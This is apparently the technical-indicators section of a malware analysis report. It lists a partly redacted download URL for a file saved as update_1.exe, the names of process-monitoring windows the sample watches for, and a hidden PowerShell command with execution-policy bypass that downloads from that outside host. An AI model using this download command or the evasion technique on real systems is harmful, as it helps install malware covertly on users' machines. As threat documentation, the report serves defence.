Technical Information
- http://te#######ryadmin.laundrypit.com/assets/fullcalendar/fullcalendar/x.d as %temp%\update_1.exe
- ClassName: '' WindowName: 'Task Manager'
- ClassName: '' WindowName: 'Windows Task-Manager'
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: '' WindowName: 'Resource Monitor'
- ClassName: '' WindowName: 'Process Hacker'
- ClassName: '' WindowName: 'Process Explorer'
- ClassName: '' WindowName: 'System Explorer'
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://te#######ryadmin.laundrypit.com...' (with hidden window)